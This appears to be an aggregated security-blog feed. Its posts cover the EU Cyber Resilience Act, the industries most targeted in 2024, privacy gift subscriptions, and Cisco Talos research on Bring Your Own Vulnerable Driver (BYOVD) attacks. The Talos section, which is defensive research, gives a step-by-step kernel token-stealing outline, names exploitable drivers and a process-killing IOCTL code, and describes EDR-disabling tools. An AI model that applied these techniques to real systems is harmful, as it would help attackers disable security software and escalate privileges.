Transparency is a critical element of the Cyber Resilience Act. The Act mandates that products with digital components must be assessed for conformity, with a special focus on those deemed to be higher risk.  

  • Lifecycle Cybersecurity Assessments: Assessments will verify that products meet cybersecurity requirements throughout their lifecycle, ensuring manufacturers handle vulnerabilities responsibly and products are secure by default. 

  • Market Surveillance and Compliance: The CRA provides a framework for market surveillance authorities to ensure that products meet cybersecurity standards. If a product poses significant cybersecurity risks or fails to comply with regulations, authorities can enforce corrective actions, including recalls or withdrawals. 

  • CE Marking as Compliance Indicator: The CE marking will serve as the primary indicator of a product’s compliance with cybersecurity standards, helping consumers make informed purchasing decisions. 

  • Harmonized Standards for Compliance: The CRA encourages the development of harmonized standards to simplify the conformity assessment process. Products meeting these standards will be presumed compliant, streamlining market entry and ensuring consistent security levels across the EU. 

  • Cybersecurity Certifications: The EU Cybersecurity Certification Scheme (EUCC) will be an essential tool for manufacturers to demonstrate compliance with cybersecurity requirements for products sold within the EU. 

  • Role of the European Commission: The Commission will adopt these cybersecurity standards and provide additional technical specifications as needed to support compliance. 

Cybersecurity and the Digital Single Market 

The CRA plays a pivotal role in the EU’s Digital Single Market, which aims to ensure the free flow of digital products and services while maintaining high standards of safety and security. By introducing the CE marking for compliant products, the CRA provides a unified approach that prevents the fragmentation of the digital market. Consumers will have confidence that the digital products they purchase are secure, reducing risks associated with cyberattacks and ensuring the integrity of Europe’s digital economy. 

In this context, market surveillance authorities will work together to monitor compliance across Member States, while entities like ENISA and CSIRTs (Computer Security Incident Response Teams) will ensure that cybersecurity incidents and vulnerabilities are effectively reported and managed. 

As the Cyber Resilience Act transitions into full effect by December 2027, Member States will provide support for small businesses and microenterprises to help them comply with the new cybersecurity requirements. This support could include regulatory sandboxes, training programs, and guidance to reduce the burden of compliance for smaller players in the market.  

Additionally, financial aid may be made available to help reduce the costs of third-party conformity assessments, making it easier for smaller manufacturers to meet the high standards of the CRA. 

Penalties for Non-Compliance 

The Cyber Resilience Act (CRA) enforces penalties for non-compliance, emphasizing the importance of adhering to cybersecurity requirements within the European Union.  

  • Penalties for Non-Compliance: Companies failing to meet the CRA’s obligations may face significant fines. Serious violations could result in fines of up to €15 million or 2.5% of the company’s worldwide annual turnover from the previous financial year, whichever is higher. For other breaches, fines could reach €10 million or 2% of annual turnover. 

  • Fines for Misleading Information: Providing incorrect, incomplete, or misleading information to market surveillance authorities or notified bodies may incur fines of up to €5 million or 1% of the company’s worldwide turnover. 

  • Penalty Structure: The penalties are designed to be effective, proportionate, and dissuasive, ensuring strong deterrents against non-compliance. Market surveillance authorities are responsible for enforcing these penalties and can take actions such as requiring corrective measures, restricting non-compliant products, or removing them from the market. 

  • Role of Member States: Each Member State must establish rules for penalties and enforce them effectively, sharing information with other EU countries as necessary. 

  • Factors in Determining Fines: Authorities will consider factors like the nature and severity of the infringement, its consequences, and the company’s size and market share when determining fines. 

  • Combination of Fines and Corrective Actions: Administrative fines may be combined with other corrective measures to ensure that companies comply with cybersecurity standards and protect the digital ecosystem. 

How Cyble, the award winning Cybersecurity firm, help you achieve compliance?

The Cyber Resilience Act (CRA) marks an important milestone in enhancing cybersecurity across Europe, solidifying the EU’s position as a prominent player in the global effort to secure cyberspace. With mandatory requirements for digital products, a focus on transparency in vulnerability management, and a framework for market surveillance, the CRA ensures the safety and security of Europe’s interconnected digital ecosystem. 

To better understand the complexities of compliance and upgrade your cybersecurity efforts, Cyble, a leading provider of threat intelligence solutions, offers powerful tools to help organizations be compliance-ready. Cyble’s flagship platform, Cyble Vision, utilizes AI, machine learning, and human intelligence to monitor and manage digital risks effectively. With features like continuous deep and dark web monitoring, attack surface management, and real-time alerts, Cyble empowers businesses to identify vulnerabilities, mitigate threats, and maintain compliance with the CRA’s stringent requirements. 

By integrating Cyble’s solutions, organizations can ensure secure products, manage vulnerabilities, and provide timely updates, helping them meet the rigorous cybersecurity standards set by the CRA. Cyble’s proactive threat intelligence capabilities and real-time insights enable businesses to protect their digital assets, comply with regulatory obligations, reduce cyberattack risks, and enhance overall resilience in the digital environment. 

The post Europe’s Cyber Resilience Act: A New Era of Cybersecurity for Digital Products  appeared first on Cyble.

Blog – Cyble – ​Read More

Top 10 Industries Targeted by Threat Actors in 2024 

Cyble | Threat Actors

As cyber threats continue to evolve, threat actors are refining their techniques and focusing on industries that hold valuable information or play critical roles in society. From ransomware attacks paralyzing operations to data breaches compromising millions of individuals, no sector is immune to cyberattacks. Drawing from recent reports and insights, this blog explores the top 10 industries targeted by cybercriminals in 2024 and the measures they can adopt to bolster their defenses. 

1.Government and Public Sector: Custodians of National Security 

Government agencies and public sector entities face constant threats, often from nation-state actors seeking strategic advantages or hacktivists with ideological motivations. The sheer volume of citizen data and critical infrastructure managed by these organizations makes them prime targets. 

Major Threats: 

  • Espionage: Stealing sensitive data for strategic or financial advantage. 

  • DDoS Attacks: Overwhelming systems to disrupt public services. 

Mitigation Strategies: 

Government entities need to prioritize inter-agency collaboration and establish centralized cybersecurity frameworks. Investments in AI-based threat intelligence platforms and public-private partnerships can also bolster resilience against sophisticated attacks. 

2. Energy and Utilities: The Backbone of Critical Infrastructure 

The energy and utilities sector plays a pivotal role in national economies and security. This makes it a frequent target for both cybercriminals and nation-state actors, with attacks often aiming to disrupt critical infrastructure. 

Major Threats: 

  • ICS Attacks: Compromise of control systems can lead to widespread outages. 

  • Supply Chain Attacks: Threat actors exploit vulnerabilities in third-party vendors to infiltrate systems. 

Mitigation Strategies: 

To protect against these threats, the sector must prioritize ICS cybersecurity by segmenting operational networks from IT networks. Enhanced supply chain scrutiny, robust third-party risk management to monitor vendor vulnerabilities, and partnerships with government cybersecurity agencies can further strengthen defenses against advanced threats. 

3. Healthcare: Where Lives and Data Intersect 

The healthcare industry is one of the fastest-growing targets for cybercriminals, with a staggering 180% increase in ransomware and database leak incidents compared to 2023. Patient safety, critical care, and sensitive medical data make this sector highly lucrative for attackers. 

Major Threats: 

  • Ransomware: Delays in accessing medical records can have life-threatening consequences. 

  • Database Leaks: Leaked patient records often lead to identity theft and insurance fraud. 

Mitigation Strategies: 

Healthcare organizations must adopt a layered security approach, including data encryption, multi-factor authentication, and comprehensive employee training programs to detect phishing attempts. Regular cybersecurity drills and incident response planning are also essential. 

4. Manufacturing: The Cornerstone of Global Supply Chains 

The manufacturing sector leads the list, experiencing an alarming 377 confirmed attacks in the first half of 2024 alone. Manufacturing remains vital to the global economy, and its reliance on interconnected systems, including Industrial Control Systems (ICS), exposes it to significant risks. 

Major Threats: 

  • Ransomware: By locking critical systems and demanding high ransoms, ransomware attacks in manufacturing can lead to halted production lines, financial losses, and delayed supply chains

  • Database Leaks: Intellectual property, design data, and supply chain information have been prime targets for data exfiltration. 

Mitigation Strategies: 

To mitigate these threats, manufacturers should prioritize securing Industrial Control Systems (ICS) by isolating critical systems, conducting regular vulnerability assessments, and adopting robust endpoint protection solutions. Additionally, incorporating advanced network monitoring tools like Cyble Vision can help detect anomalies before they escalate into breaches. 

5. Financial Services: A Prime Target for Monetary Gain 

The financial services sector consistently ranks among the most targeted industries due to its access to funds and sensitive customer data. In 2024, cybercriminals have adopted sophisticated tactics, leveraging advanced persistent threats (APTs) and exploiting insider vulnerabilities. 

Major Threats: 

  • Ransomware: Demands for multimillion-dollar payments are becoming routine. 

  • Cryptocurrency Exploits: Attackers target blockchain systems and exchanges to siphon off digital assets. 

  • Phishing and Social Engineering: Deceptive tactics to gain unauthorized access to accounts. 

Mitigation Strategies: 

To combat these threats, financial institutions must deploy state-of-the-art AI-driven Threat Intelligence tools. These tools can identify anomalous patterns indicative of fraud or cyberattacks. Additionally, implementing strict access controls and conducting regular security audits are crucial for minimizing risk. 

6. Professional Services: Custodians of Confidential Data 

Professional service firms, including law, accounting, and consulting firms, have witnessed a 15% uptick in cyberattacks compared to 2023. These organizations store highly sensitive client data, making them attractive to threat actors

Major Threats: 

  • Ransomware: Disruption in service delivery can damage client relationships. 

  • Database Leaks: Exposed data can lead to legal liabilities and reputational damage. 

Mitigation Strategies: 

Firms should enforce strict data access controls and encrypt all client information. Regular penetration testing and vulnerability scans can help identify weaknesses before attackers exploit them. Moreover, adopting secure communication platforms can safeguard sensitive exchanges. 

7. Technology: Guardians of Innovation 

Technology companies, encompassing software developers, IT services, and hardware manufacturers, remain high-value targets. Although a slight decline in attacks was noted in 2024, this sector is still vulnerable due to the sensitivity of its intellectual property. 

Major Threats: 

  • Data Breaches: Proprietary technology, source codes, and user data are often exfiltrated. 

  • Ransomware: Cybercriminals lock critical software systems, halting innovation pipelines. 

Mitigation Strategies: 

Incorporating advanced AI-driven cybersecurity solutions can detect and neutralize threats in real-time. Technology firms should also implement bug bounty programs to uncover vulnerabilities before malicious actors exploit them. 

8. Retail and E-commerce: A Treasure Trove of Consumer Data 

Retailers and e-commerce platforms process massive volumes of personal and payment information, making them a lucrative target for threat actors. In 2024, both online and physical operations have faced increased attacks. 

Major Threats: 

  • POS Malware: Point-of-sale systems are compromised to steal cardholder data. 

  • Credential Stuffing: Attackers exploit reused passwords to breach user accounts. 

Mitigation Strategies: 

Retail businesses must adopt end-to-end encryption for payment data, deploy multi-factor authentication for account access, and regularly monitor systems for unusual activity. Cybersecurity awareness campaigns targeting both employees and customers can further reduce risks. 

9. Education: Hubs of Knowledge and Innovation 

Educational institutions, particularly universities, are increasingly targeted for their intellectual property, personal data, and operational vulnerabilities. Attackers often aim to disrupt operations or monetize stolen data on the dark web

Major Threats: 

  • Dark Web Exploitation: Selling stolen academic research and personal data. 

  • DDoS Attacks: Crippling online learning platforms and administrative systems. 

Mitigation Strategies: 

Educational institutions must implement robust cybersecurity frameworks, including identity management systems and regular security awareness training. Strong network segmentation and frequent system updates can also help reduce exposure to cyber threats

10. Small Businesses: The Underdogs in Cybersecurity 

Small and medium-sized businesses (SMBs) are often perceived as easy targets due to their limited cybersecurity budgets and expertise. Despite their size, the impact of a breach on SMBs can be devastating. 

Major Threats: 

  • Phishing: Cybercriminals manipulate employees to gain access to sensitive data. 

  • Ransomware: Locking systems and demanding ransoms can cripple operations. 

Mitigation Strategies: 

SMBs should focus on implementing basic yet effective cybersecurity measures, such as routine software updates, secure data backup solutions, and employee training programs to recognize phishing attempts. Outsourcing cybersecurity to managed service providers (MSPs) can also offer cost-effective protection. 

Emerging Trends in Cybersecurity Attacks Across Industries 

While the above industries remain top targets, certain emerging trends in cyberattacks warrant attention across sectors: 

  • Supply Chain Vulnerabilities: Attackers increasingly target third-party vendors to infiltrate larger organizations. 

  • AI-Driven Threats: Threat actors are using AI to automate attacks and evade traditional security measures. 

  • Deepfake and Impersonation Scams: These new-age tactics are used to manipulate trust and extract sensitive information. 

Key Takeaways for 2024 

  1. Ransomware Dominates: Nearly every industry has faced ransomware attacks, underscoring the need for robust backup and recovery strategies. 

  1. Employee Awareness is Crucial: Phishing and social engineering remain the primary methods of attack. Training employees to recognize these threats can significantly reduce risks. 

  1. AI-Powered Defense is Essential: As attackers become more sophisticated, industries must leverage AI and machine learning to stay ahead. 

Conclusion 

The evolving cyber threat landscape in 2024 underscores the importance of vigilance, innovation, and collaboration in cybersecurity. Whether it is the manufacturing sector grappling with ICS vulnerabilities or small businesses struggling with limited resources, all industries must adopt a proactive stance. By prioritizing security investments, fostering a culture of awareness, and leveraging cutting-edge technologies, organizations can safeguard their operations, customers, and reputations in an increasingly connected world. 

The road ahead demands resilience, adaptability, and a unified effort against cyber adversaries. Let 2025 be a year of strengthened defenses and collective action to combat the relentless tide of cyber threats. 

The post Top 10 Industries Targeted by Threat Actors in 2024  appeared first on Cyble.

Blog – Cyble – ​Read More

The best privacy services as a gift | Kaspersky official blog

With just a few days left before Christmas, overwhelmed shipping services might fail to deliver your gifts on time. Of course, you could always get a last-minute digital gift-card or subscription — but the fact is that everyone who might be interested in a Netflix or Spotify account probably already has one. And Telegram Premium? That’s a little awkward just now.

But there is a solution! Why not give the gift of an increased level of daily security this festive season? (A dull idea? Beats socks, surely?!) Many people know they should protect their data and online activity, but don’t have the time or energy to do so. A service that ensures their privacy is therefore not only an unusual gift, but a genuinely helpful one too.

Privacy services are generally paid for — with a few rare exceptions. After all, maintaining servers to store data and developing hack-resistant software comes with a cost. Without subscription fees, these services would have to sell user data to advertisers — just like Google and Meta do — which would defeat the point. So a year-long subscription to a privacy-enhancing service has financial value as well.

With our recommended services, your giftee can replace unsafe office applications, note-taking services, and messengers with privacy-focused alternatives that don’t misuse stored information.

But before making a purchase, keep in mind two key points:

First, services designed for communication or collaboration, such as encrypted messengers, are useless to gift to a single person. Who will you message if none of your friends use the app? It’s probably better to gift such a service to an entire group.

Second, privacy tools may offer less convenience and functionality compared to popular alternatives that prioritize less on security. Whether this compromise proves critical will depend on the recipient’s needs and habits.

With these provisos duly noted, let’s explore some high-quality privacy-oriented alternatives to popular services that would make great gifts this Christmas or New Year.

Office applications

Personal diaries, research-paper drafts, and financial calculations are becoming harder to protect from prying eyes. Services like Google Docs have always been completely online — sparking both concerns about leaks, and debates over how Google processes stored data. Microsoft has been trying to catch up in recent years, including with a host of questionable features even in its offline Office suite such as auto-saving to OneDrive, optional “connected experiences”, and LinkedIn integrations. Storing data in the cloud isn’t necessarily problematic in itself, but there are concerns that documents can be used for ad targeting, AI training, or other unrelated purposes.

Is it possible to combine collaborative document editing and cloud storage without these concerns? As it turns out, yes. A less feature-rich, yet convenient and private alternative to Google Docs and Office365 is the CryptPad service. You can work together on documents, slides, spreadsheets, and whiteboards, while storing all data on servers with end-to-end encryption.

If you want (and have the needed tech-wherewithal), you can set up a CryptPad server independently. However, there’s no need for ordinary users to do so. The developers themselves maintain the cryptpad.fr server, offering paid plans for increased storage and other benefits. Plans are available for €5, €10, and €15 per month, with discounts for annual payments. You can explore other public CryptPad servers here.

VPN

Although we’ve written repeatedly about the benefits of using a VPN, let’s remember once again that a VPN is not a standalone privacy tool. However, when used correctly alongside other tools, a VPN can indeed help enhance privacy. For example, it can protect against surveillance by your internet provider or Wi-Fi hotspot owner, and secures your data from hackers sitting at the next table in a cafe. There are thousands of VPN services to choose from, with people using them for a variety of practical ends. But free VPNs always come with a question: how do they remain free? After all, maintaining a VPN service has its costs. Alas, the adage “if you’re not paying for the product, you are the product” applies here too.

That’s why we recommend using a trusted, paid VPN instead of just some random one from the internet. Choose a paid-only service from a company with proven expertise in cybersecurity. For example, a fast and unlimited VPN like can be purchased either can be purchased either independently, or as part of the Kaspersky Plus or Kaspersky Premium subscriptions.

Messengers

While popular messengers like WhatsApp and Signal already provide end-to-end encryption, there’s still room for improvement when it comes to privacy. Both apps require a phone number for registration, and WhatsApp, as part of the Meta empire, collects metadata about users’ social connections.

The Threema messenger is free of these issues. Threema allows registration with a random ID and doesn’t require a phone number. It also enables users to manage the trust level of their contacts. For example, you can verify encryption keys by physically being near your conversation partner. While similar verification features exist in Signal and WhatsApp, they’re buried deep in menus. Threema, on the other hand, shows the trust level right next to the contact’s name.

The app is paid, but affordable — €6 for lifetime usage.

Note-taking apps

There are tons of note apps out there — and every smartphone comes with its own — but data synchronization between devices often lacks robust encryption. We compared several private note apps in a separate article, so here we’ll just remind you that one of the best options for securely storing notes is Obsidian, a very powerful app with rich functionality. Obsidian itself is free, but its encrypted note synchronization service, Obsidian Sync, costs around $48 per year.

Browsers and email

You’ll be hard pressed to find a gift subscription to a private browser or email service, as browsers are generally free — even private ones. Meanwhile, the privacy of a specific email service doesn’t mean much when emails are still sent via standardized, open communication channels to recipients who don’t use private services.

However, your everyday online activities can be made significantly more private by using Kaspersky Premium. This is the most advanced version of our comprehensive home user protection, with maximum privacy protection functionality. Thanks to Private Browsing and Webcam and Mic Control, Kaspersky Premium minimizes your digital footprint on the internet, and prevents more dangerous threats like spyware and phishing. The Safe Money feature protects your finances when shopping/paying online, while Identity Theft Check notifies you of any data leaks and advises on how to address them.

On mobile devices, Kaspersky Premium not only prevents harm from phishing and malware, but also protects against surveillance from AirTags or stalkerware. And of course, Kaspersky Premium includes the Kaspersky Password Manager, the unlimited high-speed Kaspersky VPN Secure Connection, and even a year of Kaspersky Safe Kids protection.

Any of these gifts is a perfect way to share your care — ensuring the privacy and security of your loved ones in the year ahead.

Kaspersky official blog – ​Read More

Exploring vulnerable Windows drivers

Exploring vulnerable Windows drivers

This post is the result of research into the real-world application of the Bring Your Own Vulnerable Driver (BYOVD) technique along with Cisco Talos’ series of posts about  malicious Windows drivers. Some of this research was presented at the AVAR conference in Chennai at the beginning of December 2024. 

We would like to send a special thanks to Connor McGarr, Russell Sanford, Ryan Warns, Tim Harrison and Michal Poslušný for their previous work on analyzing vulnerabilities in drivers.  

During our research into vulnerable Windows drivers, we investigated classes of vulnerabilities typically exploited by threat actors as well as the payloads they typically deploy post-exploitation. The attacks in which attackers are deliberately installing known vulnerable drivers only to later exploit them is a technique referred to as Bring Your Own Vulnerable Driver (BYOVD). 

How are threat actors using BYOVD? 

The malicious actors use these drivers to perform a myriad of actions that help them achieve their goals. In our research, we identified three major payloads used, which we describe below.  Along with these payloads, we also identified recent activity linked to ransomware groups, which demonstrates real-world cases of malicious actors exploiting vulnerable Windows drivers to achieve their objectives. 

Vulnerable drivers and common payloads 

Local escalation of privileges (admin to kernel/system) 

One of the most common payloads, when we consider vulnerable drivers with arbitrary kernel memory write vulnerabilities, is escalating the privileges of a malicious process. The access privileges for any process are stored in the primary access token structure, which is contained at an undocumented offset in the _EPROCESS structure, the kernel mode structure used to maintain information about each individual process by the Windows kernel. Vergilius Project contains the documentation and offsets of almost all undocumented Windows structures, including _EPROCESS, and can be used as a reference, equally by offensive researchers and defenders.    

A common strategy for escalating privileges of an unprivileged process is to find the _EPROCESS structure of a higher privileged process in kernel memory and replace the access token of the unprivileged process with the access token of the privileged process, which is relatively simple if a vulnerable drivers can be used for reading and writing kernel memory space.  

Exploring vulnerable Windows drivers
_EPROCESS structure contains Windows Process Primary access token (credit: Windows Internals 7th edition)

For example, a privilege escalation may be done by following the steps below: 

  1. Find one _EPROCESS structure/object 
  2. For example, load ntoskernel.exe in user mode and calculate RVA to PsInitialSystemProcess, which points to the System process (id: 0x04) _EPROCESS structure when ntoskernel.exe is loaded in memory during the boot process. 
  3. Use NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS) 11, ModuleInfo, 1024 * 1024, NULL))) // 11 = SystemModuleInformation to find ntoskernel VA – use the vuln driver to read the offset, add the RVA to find the _EPROCESS structure in kernel memory. 
  4. Read the token from the known offset using the vulnerable driver read or memory copy functionality. 
  5. Parse _EPROCESS to find the  ActiveProcess links member that points to a linked list of other _EPROCESSES and iterate until the low privilege process is found. 
  6. Overwrite the unprivileged process access token with the one previously saved from the SYSTEM process, using a vulnerable driver kernel memory write functionality.  

Loading of unsigned kernel code 

Arbitrary kernel memory write vulnerabilities in drivers can be used to deploy unsigned malicious code into the kernel memory space, either in the shellcode format or a format of the unsigned malicious driver. There are several open-source unsigned device drivers loading utilities. In one instance, Lenovo Mapper was used as a base to develop a game cheat utility “sexy_girl_addy.exe”, which was uploaded to VirusTotal in May 2024. The utility used the code in Lenovo Mapper to load a driver which seems to attempt to disable the TPM-based license check in the game Valorant.  

Exploring vulnerable Windows drivers
Lenovo Mapper code is used to deploy an unsigned cheat driver using the previously mentioned arbitrary memory write vulnerability CVE-2022-3699
Exploring vulnerable Windows drivers
TPM driver functionality was disabled to prevent Valorant license check by the cheat

Bypass EDR software or game anti cheat software 

To showcase an example of malware exploiting vulnerable drivers to terminate EDR tools, we chose a Gh0stRAT campaign from September 2024. The dropper drops an executable “nthandlecallback.exe”, a vulnerable Dell binary utilities driver “dbutil_2_3.sys”, and a ZIP file with the name “tree.exe”. The ZIP contains an executable file “EDR.exe”, a DLL file “irrlicht.dll” and an encrypted file “server.log”. “EDR.exe” is a variant of the open-source tool RealBlindingEDR used to disable EDR programs by exploiting arbitrary memory write vulnerability in Dell’s binary utility driver while the first executable loads the DLL, which decrypts the final Gh0stRAT payload from the encrypted file.  

Exploring vulnerable Windows drivers
In September 2024, a Gh0stRAT campaign used RealBlindingEDR to disable EDR drivers

RealBlindingEDR is just one of many open-source tools developed for the purpose of disabling endpoint security software, and they are used by both threat actors and in red team-based exercises. 

Exploring vulnerable Windows drivers
Dbutil_2_3.sys is one of the drivers supported for disabling EDR tools by RealBlindingEDR

Miscellaneous other payloads 

Vulnerable drivers, mostly in the category of drivers with insufficient access controls, have been used in some advanced attacks. For example, in the Shamoon campaign, a RawDisk driver from Eldos was used to overwrite hard drives, while in February 2022, HermeticWiper used a proxy physical disk writing driver from “EaseUS Partition Master” driver partition manager “empntdrv.sys” for overwriting drives. HermeticWiper contained four embedded resources, which are compressed copies of drivers used by the wiper, depending on the Windows version and the default word memory size for the operating system. 

 

Exploring vulnerable Windows drivers
Different versions of “EaseUS Partition Master” partition manager driver are embedded as resources into HermeticWiper code

 

Ransomware examples of malicious actors’ use of BYOD 

With the wide availability of EDR bypassing tools exploiting vulnerable drivers, it is not a surprise that the exploitation moved from the domain of advanced threat actors into the domain of commodity threats, primarily ransomware. We document here some of the known ransomware groups employing the BYOVD technique.  

January – Kasseika  

In January 2024, Kasseika ransomware operators abused a vulnerable driver, “viragt64.sys”, which is part of the legitimate VirIT antivirus software, to disable a pre-determined list of 991 processes related to security tools and system utilities. The ransomware-as-a-service (RaaS) operation has been active since 2023 and uses double extortion techniques but does not operate a data leak site. In recent attacks, the ransomware first executes a script to load various tools, such as a malicious executable named “Martini.exe” and the vulnerable driver that is renamed “Martini.sys”. Next, Kasseika will create and start a new service whereby the driver is loaded into the malicious executable.   

The executable starts scanning the environment for the hard-coded list of processes and, if detected, a control code is sent to the driver enabling it to terminate processes.  

March – Akira  

In March 2024, Akira has been observed abusing the legitimate, signed Zemana anti-malware kernel driver “zamguard64.sys” via PowerTool to disable EDR at the kernel level. The exploitation of the Zemana zamguard driver was a main component of the popular Terminator EDR killer tool listed for sale on illicit marketplaces beginning May 2023.  

July – Qilin   

In July 2024, the Qilin ransomware group, another group operating under a Raas model, was observed using a new malware dubbed “Killer Ultra” within an attack. Killer Ultra has a plethora of capabilities, including the ability to terminate security tools with a BYOVD technique, abusing a known arbitrary process termination vulnerability impacting Zemana Anti-Keylogger driver “ ”, tracked as CVE-2024-1853. The vulnerability enables attackers with the ability to terminate processes. Upon execution, Killer Ultra unpacks the vulnerable driver and creates a new service to looks for and disable a list of security tools.    

July – BlackByte  

Talos recently observed and documented developments in recent BlackByte attacks in July 2024 leveraging BYOVD to facilitate host encryption. The newer encryptor variant was observed dropping four vulnerable drivers as part of BlackByte’s usual BYOVD attack chain, which is an increase from the two or three drivers described in previous reports.These drivers consisted of RtCore64.sys, a driver originally used by MSI Afterburner a system overclocking utility, DBUtil_2_3.sys, a driver that is part of the Dell Client firmware update utility, zamguard64.sys, a part of the previously mentioned Zemana Anti-Malware (ZAM) application exploited by other threat actors, and gdrv.sys, a component of is the GIGABYTE tools software package for GIGABYTE motherboards. 

These four drivers were renamed and dropped by the encryptor binary in all BlackByte attacks investigated by Cisco Talos Incident Response (Talos IR), each with a similar naming convention. The nomenclature for the vulnerable drivers consisted of eight random alphanumeric characters followed by an underscore and an iterating number value.  

August – RansomHub  

In August 2024, RansomHub ransomware actors were observed using a new malware known as EDRKillShifter to disable security tools prior to executing the ransomware binary. The EDRKillShifter can act as a loader for a vulnerable legitimate driver that, once exploited, can facilitate persistent defense evasion. Recent exploits used by the adversary are related to POCs found on Github leveraging RentDrv2, while the other exploited a driver called ThreatFireMonitor. The adversary initiated the process by launching the password-protected EDRKillShifter binary, which decrypts and executes an embedded resource in memory, unpacking and executing a payload to exploit the target vulnerable legitimate driver to escalate privileges and disable active EDR processes.  

The malware then created and started a new service for the driver, loading it into the system. Finally, it continuously scanned for and terminated processes that match a hardcoded list of targets, for persistent defense evasion even on reboot.  

The adoption of the BYOVD technique by RansomHub and Qilin may be linked to members of the financially motivated threat group Scattered Spider joining forces with these ransomware groups.  The new partnership was identified and disclosed in public reporting in July 2024, but it is possible the relationship was already well established before then. Scattered Spider members are known for employing BYOVD tactics since at least December 2022.  

Exploring vulnerable Windows drivers

 

Windows drivers and vulnerabilities 

Creating malicious Windows drivers is increasingly difficult 

Creating a new malicious Windows kernel driver is becoming increasingly difficult. New Windows drivers must be signed with a valid extended validation (EV) certificate by the developer, pass the Microsoft Hardware Lab Kit (HLK) compatibility tests, and be signed by the Microsoft Dev Portal.  

However, this complex process, introduced for any newly created Windows kernel or user mode driver, does not apply to existing drivers, which means that legacy drivers signed with valid certificates will still be loaded into the Windows kernel space.  

Installing and exploiting existing legacy vulnerable drivers may be one of the very few ways to make changes to kernel data structures or execute code in kernel, as drivers have the same permissions as any other Windows kernel component.  

Exploring vulnerable Windows drivers
Exploiting vulnerability in a legacy driver is the same as exploiting any kernel vulnerability

Microsoft introduced a blocklist of known vulnerable drivers to tackle this issue. At the beginning, the list was included into the Windows Defender Application Control feature and was superseded by the Windows Security application in newer Windows versions.  

Although the vulnerable drivers block list is turned on by default in systems running the Windows 11 2022 update or with systems with hardware virtualization code integrity (HVCI) turned on, there are still many systems which can be attacked by deploying a vulnerable driver or any newly discovered vulnerable driver that is not already on the blocklist.   

Common classes of vulnerabilities in BYOVD drivers 

While investigating vulnerable Windows kernel drivers commonly used by threat actors for BYOVD campaigns, we identified three classes of vulnerabilities that are typically exploited: arbitrary MSR writes, arbitrary kernel memory writes, and insufficient access controls to driver’s functionality. This classification is not strict, and one driver can belong to multiple classes of vulnerabilities.  

Arbitrary MSR read/write vulnerabilities 

To consider this class of vulnerabilities, we first need to introduce CPU model specific registers (MSRs). MSRs are additional CPU registers that are used by the CPU and the operating system for various purposes, including regulation of caching mechanism, regulation of fan speed, or transition from user mode into kernel mode. The MSRs can be addressed by their specific number, and some of them also have human readable names.  

Exploring vulnerable Windows drivers
A specific MSR is key for making transition from user to kernel modes after calling a win32 API function

 As a reminder, the transition from kernel to user mode happens in the lowest user mode DLL layer, usually “ntdll.dll”, when a system call number is placed into register rax and the syscall or the “int 0x2e” instruction is executed. During the transition, the syscall instruction updates the Instruction Pointer (RIP) and sets it to the address of the system call handler in the kernel as well as the Stack Pointer (RSP) to point to a stack in kernel space. 

The first function to run is “KiSystemCall64”, and a question one can ask is how do Windows know where to start the execution in kernel mode? The answer lies in a MSR specifically used during user to kernel mode transition. For 64-bit Windows systems, it is the IA32_LSTAR (MSR 0xC0000082), which contains the address of the kernel-mode entry point for the syscall instruction, typically the KiSystemCall64 function. 

Exploring vulnerable Windows drivers
MSR 0xc0000082 contains the address of the first instruction to execute in kernel mode

By having the ability to write content into arbitrary MSRs, attackers may be able to replace the pointer to KiSystemCall64 with the pointer to a malicious function that can run code in the kernel context.  

As an example of a driver vulnerable to arbitrary MSR modifications, we chose WinRing0 driver, which is commonly used by XMRig cryptocurrency mining software to disable some processor features such as caching, to increase the performance of the miner. WinRing0 is also included in many open and closed source programs. Unfortunately, the driver is also exposed to an arbitrary MSR write vulnerability which can lead to kernel mode code execution in versions of Windows prior to Windows 8 or to escalation of privileges in later Windows versions. This method is mitigated in the latest Windows versions with the latest exploit mitigations, such as Virtualization Based Security (which will be discussed later in the post), which is enabled by default.    

Exploring vulnerable Windows drivers
WinRing0 driver is vulnerable to an arbitrary MSR write vulnerability

Arbitrary kernel physical memory read/write vulnerabilities 

The second class of vulnerabilities in frequently used BYOVD drivers is the arbitrary kernel memory write class. Here, a driver functionality to write arbitrary memory is used as a write primitive to deploy shellcode into kernel memory or change important kernel data structures to achieve escalation of privileges for a malicious user mode process.  

A significant number of drivers with this class of vulnerability exists, and most of them are well documented. Readers are referred to the loldrivers project to find examples of vulnerable drivers allowing kernel memory write.  

Any driver that uses one of the following kernel functions for may be regarded as a candidate for this class of vulnerabilities, although further analysis is almost always required to conclude that a user buffer and the target address can be supplied to the driver through a user-accessible device I/O control code (IOCTL): 

Access to Physical Memory 
MmMapIOSpace() 
ZwMapViewOfSection()
  
PCI Config Space Access 
HalSetBusDataByOffset() 
HalGetBusDataByOffset()
  
Memory Copying Operations 
memcpy() 
memmove() 

A good example of this vulnerability group is CVE-2022-3699, a vulnerability in a Lenovo driver that allows arbitrary memory reading and writing.  

Exploring vulnerable Windows drivers
CVE-2022-3699 – memory write via exposed MmMapIoSpace function in a Lenovo driver

 

Misusing existing functionality in Windows drivers with insufficient access controls 

The third and the last class of vulnerabilities used by threat actors in attacks using BYOVD drivers is misusing existing driver functionality caused by insufficient access controls.  

INF files are files used during a driver’s installation, and among other things, they also contain permissions for the driver, specified using the SDDL language. The Security Descriptor Definition Language (SDDL) is a domain specific language that allows components to generate access control lists (ACLs) using a string format. It is utilized in both user-mode and kernel-mode programming. The diagram below illustrates how SDDL strings are structured for device objects. 

The access value specifies the type of access allowed. The SID value specifies a security identifier that determines to whom the access value applies (for example, a user or group). For example, string “D:P(A;;GA;;;SY)(A;;GR;;;WD)” allows the system (SY) access to everything and allows everyone else (WD) only read access.  

 

Exploring vulnerable Windows drivers
Security Descriptor Definition Language string format manages access permissions to driver objects

Programming Windows kernel drivers has a steep learning curve and, as a consequence, many drivers contain code that is copied from templates and example drivers, including their SDDL access permissions. When a driver is created, it is likely that its access permissions will be inadequate and will allow unprivileged users access to functionality that should otherwise be available to users with higher privilege levels.  

A good example of a vulnerable driver with insufficient permissions would be an old version of an antimalware software driver “viragt64.sys” (VirIT Agent System) developed by TG Soft, which exposes the functionality of terminating a process from the kernel mode to users with lower levels of privileges. This driver is used by ransomware threat actors such as Kasseika to terminate other antimalware and EDR products.  

Exploring vulnerable Windows drivers
The device IOCTL control code 0x82730030 is used to terminate an arbitrary process from the kernel mode
Exploring vulnerable Windows drivers
Viragt64.sys used ZwTerminateProcess to terminate arbitrary process, which can be misused by threat actors due to insufficient access permissions

